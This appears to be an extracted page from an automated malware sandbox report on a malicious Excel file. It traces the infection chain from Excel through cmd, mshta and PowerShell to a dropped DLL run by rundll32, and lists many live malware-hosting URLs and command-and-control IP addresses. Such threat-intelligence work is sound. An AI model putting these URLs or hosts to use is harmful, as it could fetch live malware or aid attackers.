                            Replication Through Removable MediaLaunchdRc.commonRc.common1
                            Virtualization/Sandbox Evasion
                            Cached Domain Credentials1
                            Virtualization/Sandbox Evasion
                            VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                            External Remote ServicesScheduled TaskStartup ItemsStartup Items111
                            Process Injection
                            DCSync2
                            Process Discovery
                            Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                            Hidden Files and Directories
                            Proc Filesystem1
                            Application Window Discovery
                            Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                            Rundll32
                            /etc/passwd and /etc/shadow1
                            Remote System Discovery
                            Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 562504 Sample: opastonline.com.xls Startdate: 28/01/2022 Architecture: WINDOWS Score: 100 49 129.232.188.93 xneeloZA South Africa 2->49 51 162.214.50.39 UNIFIEDLAYER-AS-1US United States 2->51 53 42 other IPs or domains 2->53 67 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->67 69 Found malware configuration 2->69 71 Antivirus detection for URL or domain 2->71 73 14 other signatures 2->73 14 EXCEL.EXE 53 12 2->14         started        17 svchost.exe 2->17         started        signatures3 process4 file5 47 C:\Users\user\Desktop\opastonline.com.xls, Composite 14->47 dropped 19 cmd.exe 14->19         started        process6 process7 21 mshta.exe 11 19->21         started        dnsIp8 55 91.240.118.172, 49165, 49166, 80 GLOBALLAYERNL unknown 21->55 24 powershell.exe 12 7 21->24         started        process9 dnsIp10 59 weezual.fr 213.186.33.4, 49167, 80 OVHFR France 24->59 61 michaelcrompton.co.uk 217.160.0.155, 49168, 80 ONEANDONE-ASBrauerstrasse48DE Germany 24->61 63 mycloud.suplitecmo.com 24->63 45 C:\ProgramData\JooSee.dll, PE32 24->45 dropped 77 Powershell drops PE file 24->77 29 cmd.exe 24->29         started        file11 signatures12 process13 process14 31 rundll32.exe 29->31         started        process15 33 rundll32.exe 1 31->33         started        file16 43 C:\Windows\SysWOW64\...\pevlwp.arl (copy), PE32 33->43 dropped 65 Hides that the sample has been downloaded from the Internet (zone.identifier) 33->65 37 rundll32.exe 33->37         started        signatures17 process18 process19 39 rundll32.exe 2 37->39         started        dnsIp20 57 160.16.102.168, 49169, 80 SAKURA-BSAKURAInternetIncJP Japan 39->57 75 System process connects to network (likely due to code injection or exploit) 39->75 signatures21

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand
                            No Antivirus matches
                            SourceDetectionScannerLabelLink
                            C:\ProgramData\JooSee.dll100%Joe Sandbox ML
                            SourceDetectionScannerLabelLinkDownload
                            11.2.rundll32.exe.28f0000.11.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            11.2.rundll32.exe.23a0000.7.unpack100%AviraHEUR/AGEN.1145233Download File
                            13.2.rundll32.exe.2bd0000.14.unpack100%AviraHEUR/AGEN.1145233Download File
                            13.2.rundll32.exe.2ba0000.13.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            13.2.rundll32.exe.9f0000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            11.2.rundll32.exe.31f0000.16.unpack100%AviraHEUR/AGEN.1145233Download File
                            11.2.rundll32.exe.23f0000.8.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.2d0000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            13.2.rundll32.exe.3030000.26.unpack100%AviraHEUR/AGEN.1145233Download File
                            13.2.rundll32.exe.9c0000.4.unpack100%AviraHEUR/AGEN.1145233Download File
                            11.2.rundll32.exe.180000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            11.2.rundll32.exe.3280000.17.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            13.2.rundll32.exe.29a0000.9.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            13.2.rundll32.exe.870000.2.unpack100%AviraHEUR/AGEN.1145233Download File
                            11.2.rundll32.exe.24b0000.9.unpack100%AviraHEUR/AGEN.1145233Download File
                            13.2.rundll32.exe.2d50000.18.unpack100%AviraHEUR/AGEN.1145233Download File
                            13.2.rundll32.exe.3240000.29.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.150000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            11.2.rundll32.exe.2520000.10.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            13.2.rundll32.exe.2f70000.23.unpack100%AviraHEUR/AGEN.1145233Download File
                            11.2.rundll32.exe.260000.2.unpack100%AviraHEUR/AGEN.1145233Download File
                            13.2.rundll32.exe.2370000.6.unpack100%AviraHEUR/AGEN.1145233Download File
                            13.2.rundll32.exe.2c60000.15.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            13.2.rundll32.exe.2c90000.16.unpack100%AviraHEUR/AGEN.1145233Download File
                            13.2.rundll32.exe.2fb0000.24.unpack100%AviraHEUR/AGEN.1145233Download File
                            13.2.rundll32.exe.760000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            13.2.rundll32.exe.2e60000.21.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            11.2.rundll32.exe.31c0000.15.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            11.2.rundll32.exe.30a0000.13.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            13.2.rundll32.exe.730000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            11.2.rundll32.exe.340000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            13.2.rundll32.exe.29d0000.10.unpack100%AviraHEUR/AGEN.1145233Download File
                            13.2.rundll32.exe.2e30000.20.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            13.2.rundll32.exe.2d20000.17.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            13.2.rundll32.exe.31d0000.28.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            11.2.rundll32.exe.2b0000.3.unpack100%AviraHEUR/AGEN.1145233Download File
                            11.2.rundll32.exe.1e0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            13.2.rundll32.exe.8a0000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            13.2.rundll32.exe.2aa0000.11.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            13.2.rundll32.exe.2f40000.22.unpack100%AviraHEUR/AGEN.1145233Download File
                            13.2.rundll32.exe.2de0000.19.unpack100%AviraHEUR/AGEN.1145233Download File
                            11.2.rundll32.exe.410000.5.unpack100%AviraHEUR/AGEN.1145233Download File
                            13.2.rundll32.exe.2ad0000.12.unpack100%AviraHEUR/AGEN.1145233Download File
                            11.2.rundll32.exe.3030000.12.unpack100%AviraHEUR/AGEN.1145233Download File
                            13.2.rundll32.exe.2720000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            13.2.rundll32.exe.3000000.25.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.210000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            11.2.rundll32.exe.2330000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.720000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            13.2.rundll32.exe.2810000.8.unpack100%AviraHEUR/AGEN.1145233Download File
                            13.2.rundll32.exe.31a0000.27.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            11.2.rundll32.exe.30d0000.14.unpack100%AviraHEUR/AGEN.1145233Download File
                            No Antivirus matches
                            SourceDetectionScannerLabelLink
                            http://sep.dfwsolar.club/hzh3v/zCUz44VgIrN/PE3100%Avira URL Cloudphishing
                            http://ancyh.xyz100%Avira URL Cloudmalware
                            http://chupahfashion.com/eh6bwxk/bowptl/F2sib90zZsqJ44/bQ8VXS/PE3100%Avira URL Cloudmalware
                            http://sep.dfwsolar.club/hzh3v/z100%Avira URL Cloudmalware
                            http://danahousecare.com/wp-content/cache/nAZV1f5Bh9CFmBtl2J/PE3100%Avira URL Cloudmalware
                            http://journeypropertysolutions.com/cterq/FoPrW8qKzgIj3E8m/100%Avira URL Cloudmalware
                            http://weezual.fr/ju9c/twEHJDCvNwGimD/100%Avira URL Cloudmalware
                            http://danahousecare.com/wp-cont100%Avira URL Cloudmalware
                            http://mycloud.s0%Avira URL Cloudsafe
                            http://ancyh.xyz/assets/Pcxv1k5/PE3100%Avira URL Cloudmalware
                            http://www.protware.com/ll0%Avira URL Cloudsafe
                            http://mycloud.suplitecmo.com/Fox-CCFS/zBdGqiyW1HTZD2j/100%Avira URL Cloudmalware
                            http://91.240.110%URL Reputationsafe
                            http://91.240.118.172/cc/vv/fe.png100%Avira URL Cloudmalware
                            http://91.240.118.172/cc/vv/fe.pngPE30%Avira URL Cloudsafe
                            http://journeypropertysolutions.com/cterq/FoPrW8qKzgIj3E8m/PE3100%Avira URL Cloudmalware
                            http://stancewheels.com/wp-admin0%Avira URL Cloudsafe
                            http://91.240.118.172/cc/vv/fe.htmlfunction0%Avira URL Cloudsafe
                            http://sep.dfwsolar.club/hzh3v/zCUz44VgIrN/100%Avira URL Cloudphishing
                            http://stancewheels.com/wp-admin/bbL1MAzNvohHH/100%Avira URL Cloudmalware
                            https://www.belajarngaji.shop/wp0%Avira URL Cloudsafe
                            http://www.protware.com/0%URL Reputationsafe
                            http://michaelcrompton.co.uk/wp-admin/G/PE3100%Avira URL Cloudmalware
                            http://www.protware.com=C:0%Avira URL Cloudsafe
                            http://michaelcrompton.co.uk0%Avira URL Cloudsafe
                            http://91.240.118.172/cc/vv/fe.htmlWinSta00%Avira URL Cloudsafe
                            http://firstfitschool.com/83wg6z100%Avira URL Cloudphishing
                            http://mycloud.suplitecmo.com/Fo0%Avira URL Cloudsafe
                            https://lambayeque.apiperu.net.pe/assets/whnYzDBLH/100%Avira URL Cloudmalware
                            http://ancyh.xyz/assets/Pcxv1k5/100%Avira URL Cloudmalware
                            http://stancewheels.com/wp-admin/bbL1MAzNvohHH/PE3100%Avira URL Cloudmalware
                            http://91.240.118.172/cc/vv/fe.htmlmshta0%Avira URL Cloudsafe
                            http://www.protware.com/ode0%Avira URL Cloudsafe
                            https://www.belajarngaji.shop/wp-admin/zVhSqHo7Fi2ulNeN1/100%Avira URL Cloudmalware
                            http://weezual.fr/ju9c/twEHJDCvNwGimD/PE3100%Avira URL Cloudmalware
                            http://mycloud.suplitecmo.com0%Avira URL Cloudsafe
                            http://weezual.fr0%Avira URL Cloudsafe
                            http://91.240.118.172/cc/vv/fe.htmlB0%Avira URL Cloudsafe
                            https://160.16.102.168:80/cdIXMWziBmZNcwbniRwTByQMFFhNrKiB0%Avira URL Cloudsafe
                            http://danahousecare.com/wp-content/cache/nAZV1f5Bh9CFmBtl2J/100%Avira URL Cloudmalware
                            http://mycloud.suplitecmo.com/Fox-CCFS/zBdGqiyW1HTZD2j/PE3100%Avira URL Cloudmalware
                            http://sep.dfwso0%Avira URL Cloudsafe
                            http://firstfitschool.com/83wg6z/9TRIk5HsoTQiiVWoX/PE3100%Avira URL Cloudmalware
                            http://91.240.118.1720%Avira URL Cloudsafe
                            https://lambayeque.apiperu.net.pe/assets/whnYzDBLH/PE3100%Avira URL Cloudmalware
                            https://160.16.102.168/0%Avira URL Cloudsafe
                            https://160.16.102.168/7m0%Avira URL Cloudsafe
                            http://michaelcrompton.co.uk/wp-0%Avira URL Cloudsafe
                            http://www.protware.com0%URL Reputationsafe
                            https://lambayeque.apiperu.net.p0%Avira URL Cloudsafe
                            http://weezual.f0%Avira URL Cloudsafe
                            http://weezual.fr/ju9c/twEHJDCvN0%Avira URL Cloudsafe
                            http://michaelcrompton.co.uk/wp-admin/G/100%Avira URL Cloudmalware
                            http://91.240.118.172/cc/vv/fe.htmlr0%Avira URL Cloudsafe
                            https://www.belajarngaji.shop/wp-admin/zVhSqHo7Fi2ulNeN1/PE3100%Avira URL Cloudmalware
                            http://chupahfashion.com/eh6bwxk100%Avira URL Cloudmalware
                            http://91.240.118.172/cc/vv/fe.p0%Avira URL Cloudsafe
                            http://91.240.118.172/cc/vv/fe.html100%Avira URL Cloudmalware
                            http://chupahfashion.com/eh6bwxk/bowptl/F2sib90zZsqJ44/bQ8VXS/100%Avira URL Cloudmalware
                            http://91.240.118.172/cc/vv/fe.htmlhttp://91.240.118.172/cc/vv/fe.html0%Avira URL Cloudsafe
                            http://firstfitschool.com/83wg6z/9TRIk5HsoTQiiVWoX/100%Avira URL Cloudmalware
                            http://91.240.118.172/cc/vv/fe.htmlngs0%Avira URL Cloudsafe
                            NameIPActiveMaliciousAntivirus DetectionReputation
                            michaelcrompton.co.uk
                            217.160.0.155
                            truefalse
                              unknown
                              weezual.fr
                              213.186.33.4
                              truefalse
                                unknown
                                mycloud.suplitecmo.com
                                unknown
                                unknownfalse
                                  unknown
                                  NameMaliciousAntivirus DetectionReputation
                                  http://weezual.fr/ju9c/twEHJDCvNwGimD/true
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://91.240.118.172/cc/vv/fe.pngtrue
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://michaelcrompton.co.uk/wp-admin/G/true
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://91.240.118.172/cc/vv/fe.htmltrue
                                  • Avira URL Cloud: malware
                                  unknown
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://hekmat20.com/wp-includespowershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://sep.dfwsolar.club/hzh3v/zCUz44VgIrN/PE3powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: phishing
                                    unknown
                                    http://ancyh.xyzpowershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    https://hekmat20.com/wp-includes/7/PE3powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://chupahfashion.com/eh6bwxk/bowptl/F2sib90zZsqJ44/bQ8VXS/PE3powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://sep.dfwsolar.club/hzh3v/zpowershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://danahousecare.com/wp-content/cache/nAZV1f5Bh9CFmBtl2J/PE3powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://journeypropertysolutions.com/cterq/FoPrW8qKzgIj3E8m/powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://danahousecare.com/wp-contpowershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://mycloud.spowershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://ancyh.xyz/assets/Pcxv1k5/PE3powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://www.protware.com/llmshta.exe, 00000004.00000002.439514279.0000000004900000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://mycloud.suplitecmo.com/Fox-CCFS/zBdGqiyW1HTZD2j/powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://91.240.11powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmptrue
                                      • URL Reputation: safe
                                      low
                                      http://91.240.118.172/cc/vv/fe.pngPE3powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://journeypropertysolutions.com/cterq/FoPrW8qKzgIj3E8m/PE3powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://stancewheels.com/wp-adminpowershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://91.240.118.172/cc/vv/fe.htmlfunctionmshta.exe, 00000004.00000003.423172440.000000000263D000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://sep.dfwsolar.club/hzh3v/zCUz44VgIrN/powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: phishing
                                      unknown
                                      http://stancewheels.com/wp-admin/bbL1MAzNvohHH/powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: malware
                                      unknown
                                      https://www.belajarngaji.shop/wppowershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.protware.com/mshta.exe, 00000004.00000002.438881833.00000000027CB000.00000004.00000010.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://michaelcrompton.co.uk/wp-admin/G/PE3powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://www.protware.com=C:mshta.exe, 00000004.00000003.421270986.0000000000329000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      low
                                      http://michaelcrompton.co.ukpowershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://91.240.118.172/cc/vv/fe.htmlWinSta0mshta.exe, 00000004.00000002.438112656.0000000000230000.00000004.00000020.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://firstfitschool.com/83wg6zpowershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: phishing
                                      unknown
                                      http://mycloud.suplitecmo.com/Fopowershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://lambayeque.apiperu.net.pe/assets/whnYzDBLH/powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://ancyh.xyz/assets/Pcxv1k5/powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://stancewheels.com/wp-admin/bbL1MAzNvohHH/PE3powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://91.240.118.172/cc/vv/fe.htmlmshtamshta.exe, 00000004.00000002.438112656.0000000000230000.00000004.00000020.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.protware.com/odemshta.exe, 00000004.00000003.420844888.0000000002B41000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439061631.0000000002B46000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.436135951.0000000002B46000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://www.belajarngaji.shop/wp-admin/zVhSqHo7Fi2ulNeN1/powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://weezual.fr/ju9c/twEHJDCvNwGimD/PE3powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://mycloud.suplitecmo.compowershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://weezual.frpowershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://91.240.118.172/cc/vv/fe.htmlBopastonline.com.xls.0.drtrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://160.16.102.168:80/cdIXMWziBmZNcwbniRwTByQMFFhNrKiBrundll32.exe, 0000000D.00000003.591845765.00000000003C5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.676590864.00000000003C6000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://danahousecare.com/wp-content/cache/nAZV1f5Bh9CFmBtl2J/powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://mycloud.suplitecmo.com/Fox-CCFS/zBdGqiyW1HTZD2j/PE3powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://sep.dfwsopowershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://firstfitschool.com/83wg6z/9TRIk5HsoTQiiVWoX/PE3powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://91.240.118.172powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://lambayeque.apiperu.net.pe/assets/whnYzDBLH/PE3powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: malware
                                      unknown
                                      https://160.16.102.168/rundll32.exe, 0000000D.00000003.591835259.00000000003B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.676575735.00000000003B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://160.16.102.168/7mrundll32.exe, 0000000D.00000003.591835259.00000000003B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.676575735.00000000003B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://michaelcrompton.co.uk/wp-powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.protware.commshta.exe, 00000004.00000003.421158133.0000000002B34000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://lambayeque.apiperu.net.ppowershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://weezual.fpowershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://weezual.fr/ju9c/twEHJDCvNpowershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 00000007.00000002.676501959.00000000003F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        http://91.240.118.172/cc/vv/fe.htmlrmshta.exe, 00000004.00000002.438930744.0000000002AE5000.00000004.00000020.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://www.belajarngaji.shop/wp-admin/zVhSqHo7Fi2ulNeN1/PE3powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: malware
                                        unknown
                                        http://chupahfashion.com/eh6bwxkpowershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: malware
                                        unknown
                                        http://www.piriform.com/ccleanerpowershell.exe, 00000007.00000002.676501959.00000000003F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://91.240.118.172/cc/vv/fe.ppowershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://chupahfashion.com/eh6bwxk/bowptl/F2sib90zZsqJ44/bQ8VXS/powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: malware
                                          unknown
                                          http://91.240.118.172/cc/vv/fe.htmlhttp://91.240.118.172/cc/vv/fe.htmlmshta.exe, 00000004.00000003.422785781.0000000002635000.00000004.00000800.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://firstfitschool.com/83wg6z/9TRIk5HsoTQiiVWoX/powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://hekmat20.com/wp-includes/7/powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://91.240.118.172/cc/vv/fe.htmlngsmshta.exe, 00000004.00000002.438156977.000000000026E000.00000004.00000020.00020000.00000000.sdmptrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs
                                            IPDomainCountryFlagASNASN NameMalicious
                                            195.154.133.20
                                            unknownFrance
                                            12876OnlineSASFRtrue
                                            185.157.82.211
                                            unknownPoland
                                            42927S-NET-ASPLtrue
                                            212.237.17.99
                                            unknownItaly
                                            31034ARUBA-ASNITtrue
                                            79.172.212.216
                                            unknownHungary
                                            61998SZERVERPLEXHUtrue
                                            110.232.117.186
                                            unknownAustralia
                                            56038RACKCORP-APRackCorpAUtrue
                                            173.214.173.220
                                            unknownUnited States
                                            19318IS-AS-1UStrue
                                            212.24.98.99
                                            unknownLithuania
                                            62282RACKRAYUABRakrejusLTtrue
                                            138.185.72.26
                                            unknownBrazil
                                            264343EmpasoftLtdaMeBRtrue
                                            178.63.25.185
                                            unknownGermany
                                            24940HETZNER-ASDEtrue
                                            160.16.102.168
                                            unknownJapan9370SAKURA-BSAKURAInternetIncJPtrue
                                            81.0.236.90
                                            unknownCzech Republic
                                            15685CASABLANCA-ASInternetCollocationProviderCZtrue
                                            103.75.201.2
                                            unknownThailand
                                            133496CDNPLUSCOLTD-AS-APCDNPLUSCOLTDTHtrue
                                            216.158.226.206
                                            unknownUnited States
                                            19318IS-AS-1UStrue
                                            45.118.115.99
                                            unknownIndonesia
                                            131717IDNIC-CIFO-AS-IDPTCitraJelajahInformatikaIDtrue
                                            217.160.0.155
                                            michaelcrompton.co.ukGermany
                                            8560ONEANDONE-ASBrauerstrasse48DEfalse
                                            51.15.4.22
                                            unknownFrance
                                            12876OnlineSASFRtrue
                                            159.89.230.105
                                            unknownUnited States
                                            14061DIGITALOCEAN-ASNUStrue
                                            162.214.50.39
                                            unknownUnited States
                                            46606UNIFIEDLAYER-AS-1UStrue
                                            200.17.134.35
                                            unknownBrazil
                                            1916AssociacaoRedeNacionaldeEnsinoePesquisaBRtrue
                                            217.182.143.207
                                            unknownFrance
                                            16276OVHFRtrue
                                            107.182.225.142
                                            unknownUnited States
                                            32780HOSTINGSERVICES-INCUStrue
                                            51.38.71.0
                                            unknownFrance
                                            16276OVHFRtrue
                                            45.118.135.203
                                            unknownJapan63949LINODE-APLinodeLLCUStrue
                                            50.116.54.215
                                            unknownUnited States
                                            63949LINODE-APLinodeLLCUStrue
                                            131.100.24.231
                                            unknownBrazil
                                            61635GOPLEXTELECOMUNICACOESEINTERNETLTDA-MEBRtrue
                                            46.55.222.11
                                            unknownBulgaria
                                            34841BALCHIKNETBGtrue
                                            41.76.108.46
                                            unknownSouth Africa
